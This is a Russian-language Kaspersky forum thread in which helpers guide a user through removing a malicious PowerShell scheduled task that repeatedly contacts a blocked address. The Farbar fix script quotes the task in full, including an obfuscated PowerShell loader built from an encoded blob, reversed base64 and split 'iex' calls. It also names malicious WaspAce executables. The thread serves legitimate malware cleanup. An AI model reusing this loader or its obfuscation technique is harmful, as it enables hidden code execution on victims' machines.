Перейти к содержанию

[РЕШЕНО] PowerShell создает запрос на переход на вредоносный сайт каждые 20 минут


Рекомендуемые сообщения

Привет.
Kaspersky Anti-Virus каждые 20 минут фиксирует попытку PowerShell перейти на вредоносный сайт

Событие: Переход остановлен
Пользователь: DESKTOP-HKUMLCG\gecta
Тип пользователя: Активный пользователь
Имя программы: powershell.exe
Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0
Компонент: Веб-Антивирус
Описание результата: Запрещено
Тип: Вредоносная ссылка
Название: 66.248.206.176
Точность: Точно
Степень угрозы: Высокая
Тип объекта: Веб-страница
Имя объекта: update.php?i=bpj2fVZ_1380
Путь к объекту: http://google.ru
Причина: Kaspersky Security Network
Дата выпуска баз: Сегодня, 27.11.2021 8:05:00

Сканирование с помощью 
Kaspersky Anti-Virus и Kaspersky Virus Removal Tool ничего не обнаружило.

Помогите пожалуйста решить проблему!

Лог после работы AutoLogger прилагаю 

CollectionLog-2021.11.27-11.27.zip

Ссылка на сообщение
Поделиться на другие сайты

Выполните скрипт в AVZ из папки Autologger

begin
 DeleteSchedulerTask('Microsoft\Windows\MUI\498705764');
ExecuteSysClean;
RebootWindows(false);
end.
  • Обратите внимание: будет выполнена перезагрузка компьютера.

Пожалуйста, ЕЩЕ РАЗ запустите Autologger; прикрепите к следующему сообщению НОВЫЕ логи.

Ссылка на сообщение
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.


1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
2. Убедитесь, что в окне Optional Scan (Дополнительные опции) отмечены List BCD и 90 Days Files.
3. Нажмите кнопку Scan (Сканировать).
4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа.
5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt).
6. Файлы FRST.txt и Addition.txt заархивируйте (в один общий архив) и прикрепите к сообщению.

Ссылка на сообщение
Поделиться на другие сайты

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ограничение <==== ВНИМАНИЕ
HKU\S-1-5-21-2567911441-1973401767-2299833061-1001\...\Run: [GalaxyClient] => [X]
Task: {75435327-F07A-4166-968E-E7D8D5A61A8D} - System32\Tasks\Microsoft\Windows\BitLocker\BitLocker => powershell.exe -c "$ddd = 'v1iYAd9OxUL9VdYvwVXAQLo5oxGeOagY7xH/Xaksn3GeB5YN0hXlLNxN30TSUsZz82TXAcNEgSKhO50DoTClbId+k3L6T7NHyEDLQI811VTSDvJcxRX4d6wjiRWMFfUsyRWOKt0V+TX9CP560DzHVtRayF++MZkLlRSRAcoqoDCaVaUzkXPueoVM0necLapynUz+EfMMixatXsVL6VTEV9gWixH/KrdUgki5HPRt8DGPcOUi/gHmFeNgjCPVBpsEjwKrJ9sT7lbDRalk/nqcVdoViTu+bcYS7n2QesAzjyW/EvUZxUaCSrht72PAUM1RwQP+K6VL1AWcTbxw9ADUV/4R7xD8JOlnnSXVEscMmQSwK/JuwlbSUoUt2HuGHpsSnF2gJa4Q83+qYo5yySrIFPQAlgXYTJFt7BzKQddbzAS7UPUDhAOVXtFNqSOOdu8R9jfqBuJmijbVEokY0iD1d/tYyFXJWZtmyGCaDZ8NwCmzNsYw+XOMV5JSkXqzSa9A2ErUDdQqrQbOFddK1hi5KrcZlk6jGfZ22lSZYKpd9QCvVLYx0WXVE8tVuwLkLvtc1UHJWsgu1n2GAZMVhSCrP8Uv/WqBboh63yqgROwDxTmDEI1h9Vb4eNBf2xjGObYRkhXQK/Vj8xinPrAC9BDhA64wnSnbO5cJiA/NOZNO0kuObIVi73y1UsQlwii+bNlLtTvBOJRx1zroUaZElAfQV9Zzv1vPCIAcgRP0bq5LjQOUA/15oxqQL7dStRHkRb1+3H+VXdgAiBPgOYYSn0/MGIFtqjqYAI5fgT2+dspZuGDVWK5ujGr+DagnnRbeM5pqyVTUVthN2y2hOc8ClQeMFbAm5hTTP64CtSTjC+l0uWuFD6gNmA7iZspJhgHAVoRw/i/MGtA1m2XoXo8H8mbVJ4h2xDrpE/ZU3BDeI5p8yVTWU9JQ3BWzKrdUkwLFVOpx916pcOsE7hbMCOJmw3eXSKEBkhPNJ8pZmwjIUsgwqybBE5sYgXTnO5pf+HeLI9VMrGfoFOME1iGfColt6UX4GYd43R/2Qe0DlVDMI+xw7h6dLKIe/hKiCORpnX2FQKkRjxP1bod09Av1Q5pm+nm6DZ8EjXKyO5oR7DyvZolFmm3rD+ganTGEFppp9hmMCpQQ/RX6Z9gftQicWLErrlDSIOsUsEf6Xu92knGaD9hBxxr5ZYEdlkvJQ8gn6T2TDYYJnH2+bdU5z2ubd5h60Ur+GPJHvQyTC5th9Vb4GYdr+zajLcsVhDWMAvFs4FjedqNLvwSyT6JxxTqDTokYkA7kK4sdmQmUHsFYq0nTTJFd2DvzecBG/TLFZow3zjfgROlU0AuVHN8s6WqUfpQe01DUdvhdoxKKGfZl+hWWd+8Z/U2rBqYunW/RV9MT2B+tIYsGk2vDQMVM+X6NC4pAu3npa40PskaAcZh2m3f1B6gkjRaVHNcs70PQRpEa3SuqXqArggOeLbx6rlnUR+Yf6ACnTr1qnjbVGNMT2AitIZkfxkDKRI14v3vVSs9ClX3/c5sH53eQaolq23GmROlHixeSF4t68l/CC40SjyvIev8ElQvWPfl27y3APscZ9U26V7Yz1D7VD9QkmQn3d8EUkh6CRZs+/3GLSNY7u3npa40PskaNe4k5unD4D+IAlgWtXsVdz3edDfpb2zLid+kD2EKXWbEir1STL6hG8BC6HvRInyaWQtNT2BXjPvJIyUz7DdJG6HeJGJskiXT7TJwQ9XyPK6ZUkHDtBfQdpVjKMJBK+kLAFYlt2wLybetY1BSLWbE5owLHX9kJ6BHqCqhNnWrfN58KrgLhdsxOz3icDatx/nWcDdZEiWSxPc4ToTDDJ49k1iW/EqgolA6fE7597173RtlX3RX4d7FUlgeUA/05owLUUfkV6SToAuh3xTqEAcFMjkngccZFwhiCR9Mn6TqvDYoyjXPqcIYR+TrBf7JiizPVFeoFww==';iex('$d=([regex]::Matches(''==QKpcSKkRCKn5WayR3UnsyJ0V2RugjRUVlO601ZulGZvNmbF5Cd4VGVu0WZ0NXeTt1JogXZphCI4VWa7kiclJWb15GbhlmclNlLqJ2bkAyKgcCInAyKgwWZk9WTuomYvRCKgkSKkRGZkgyZulmc0NFN2U2chJUbvJnR6oTX0JXZ252bD5SblR3c5N1WoAyYlRGI9ACZksjclJWb15GbhlmclNFIswWZk9WTgQ3YlxWZzBCfg03JwUkVJJFRMF0QJNVWIBFXuwFXnAScl1CIElUZjlmdlRkLfRyegUmclh2dgwHIlZXayR2azlGZfJzMul2dgkWb3dGI9Aiai9GJ9tjYjRCIuJXd0Vmc9tyKqRyOzRCIy9Gei1CIdpGJbJGckAicvhnYtASXpRyWiNGJg0DIdlGJbJ2YkszckAicvhnYtASKyUTMgI3bi1CIzRCIk5WYi1CIzIDKg0DIzRCI9BTPqRyepQnb192QuIGckASZn1CIqRCKml2epsyKpRCI7Qnb192QuI2YkACds1CIpRCI7ADI9ASakgicvZ2Ow0jaksTXwslYwRCI9AycksTKzNXYwRCKzVGd5JEdldkL4YEVVpjOddmbpR2bj5WRuQHelRlLtVGdzl3UbBSPgIGcksXKzNXYwRSXn5WayR3cbBCLiNGJd11WlRXeitFKjVGZg42bpR3YuVnZ'',''.'',''RightToLeft'') | ForEach {$_.value}) -jo'+'in '''';$d=[Text.Encoding]::UTF'+2*2*2+'.GetString([Convert]::Fro'+'mB'+'ase'+8*8+'String($d));$d|i'+'ex;')" -c "$ddd = 'v1iYAd9OxUL9VdYvwVXAQLo5oxGeOagY7xH/Xaksn3GeB5YN0hXlLNxN30TSUsZz82TXAcNEgSKhO50DoTClbId+k3L6T7NHyEDLQI811VTSDvJcxRX4d6wjiRWMFfUsyRWOKt0V+TX9CP560DzHVtRayF++MZkLlRSRAcoqoDCaVaUzkXPueoVM0necLapynUz+EfMMixatXsVL6VTEV9gWixH/KrdUgki5HPRt8DGPcOUi/gHmFeNgjCPVBpsEjwKrJ9sT7lbDRalk/nqcVdoViTu+bcYS (запись имеет ещё 2572 символов). (Нет файла)
Edge Extension: (Нет имени) -> AutoFormFill_5ED10D46BD7E47DEB1F3685D2C0FCE08 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\AutoFormFill [не найдено]
Edge Extension: (Нет имени) -> BookReader_B171F20233094AC88D05A8EF7B9763E8 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\BookViewer [не найдено]
Edge Extension: (Нет имени) -> LearningTools_7706F933-971C-41D1-9899-8A026EB5D824 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\LearningTools [не найдено]
Edge Extension: (Нет имени) -> PinJSAPI_EC01B57063BE468FAB6DB7EBFC3BF368 => C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Assets\HostExtensions\PinJSAPI [не найдено]
2021-11-08 16:05 - 2021-11-08 16:05 - 000659456 _____ C:\ProgramData\i7Nh5H9k7J8ht.tmp
2021-11-08 16:05 - 2021-11-08 16:05 - 000000071 _____ C:\ProgramData\iGytjjY67i.tmp
FirewallRules: [{385EB914-AAF7-4DC9-A5C7-6B7593642F46}] => (Allow) C:\ProgramData\Windows\Profile\dllhostn.exe (WaspAce Service -> WaspAce) [Файл не подписан]
FirewallRules: [{1DF98F60-D726-47D3-BE65-2EE89CF3FBC2}] => (Allow) C:\ProgramData\Windows\Profile\wasp.exe (WaspAce Service -> WaspAce) [Файл не подписан]
FirewallRules: [{177DFCA7-D9EC-4BD6-9B58-534824AC1D68}] => (Allow) C:\ProgramData\Windows\Profile\waspwing.exe (WaspAce) [Файл не подписан]
C:\ProgramData\Windows\Profile
Reboot:
End::


2. Запустите Farbar Recovery Scan Tool.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

  • Обратите внимание: будет выполнена перезагрузка компьютера.
Ссылка на сообщение
Поделиться на другие сайты

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

  • Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
  • Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
  • Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
  • Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
  • Прикрепите этот файл в своем следующем сообщении.


 
Ссылка на сообщение
Поделиться на другие сайты
Цитата

------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.71 (64-разрядная) v.5.71.0 Внимание! Скачать обновления
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.0.0.309 Внимание! Скачать обновления
Telegram Desktop version 2.7.1 v.2.7.1 Внимание! Скачать обновления

обновите указанные программы, и на этом закончим
 

Ссылка на сообщение
Поделиться на другие сайты

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в ТурциюАрмениюСочиКамбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, клуб "Лаборатории Касперского".

Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • kotodrotin
      От kotodrotin
      Здравствуйте.
      Заметил что ноутбук начал шуметь в простое и нагружать процессор на 50-60 процентов, а нагрузка шла от программы Powershell, причем проверял в программе process explorer, потому что открывая просто диспетчер задач нагрузка процессора падала, а процесс powershell сбрасывался. Проверил антивирусом malware и drweb culteir и без результатно

    • JohnJohnson
      От JohnJohnson
      Привет! Подхватил майнер, уже знаю откуда, больше не подхвачу. Прогнал через dr web cureit, он несколько файлов нашёл и удалил, но майнер остался. Потом пошёл через AutoLogger, там в планировщке 3 файла вредоносного скрипта в powershell. Я сделал скрипт для удаления, ввёл его в АВЗ, ребутнул компьютер. Потом снова прогнал через AutoLogger, там эти файлы всё равно остались. Видимо, что-то ещё нужно добавить в скрипт. Тут я уже не компетентен(

      Заранее большое спасибо!
      CollectionLog-2022.06.25-23.31.zip
    • RevMirin
      От RevMirin
      Последнее время появилась в диспетчере задача powershell.exe. Нагружает систему так, что даже браузер хром позавидует (Скрин скину ниже). Что мне делать? Сама программа не появляется, появляется только в диспетчере
      Очень надеюсь на вашу помощь

    • dubuu
      От dubuu
      При открывании диспетчера задач прячется, видно только сторонним
      CollectionLog-2022.01.25-09.35.zip
    • L4H
      От L4H
      Здравствуйте. Третий день Касперский блокирует переход PowerShell по вредоносной ссылке:
       
      Событие: Переход остановлен
      Пользователь: AMENO\Heller
      Тип пользователя: Активный пользователь
      Имя программы: powershell.exe
      Путь к программе: C:\Windows\System32\WindowsPowerShell\v1.0
      Компонент: Веб-Антивирус
      Описание результата: Запрещено
      Тип: Вредоносная ссылка
      Название: 66.248.206.176
      Точность: Точно
      Степень угрозы: Высокая
      Тип объекта: Веб-страница
      Имя объекта: update.php?i=g7LVNEq_1790
      Путь к объекту: http://google.ru
      Причина: Kaspersky Security Network
      Дата выпуска баз: Вчера, 23.11.2021 19:43:00

      Это происходит вне зависимости от того, открыт ли браузер. Сперва было каждые 20 минут, потом реже, но все равно регулярно.
      KVRT и CureIt ничего не нашли.

      Помогите решить проблему, пожалуйста.
      CollectionLog-2021.11.23-23.54.zip
×
×
  • Создать...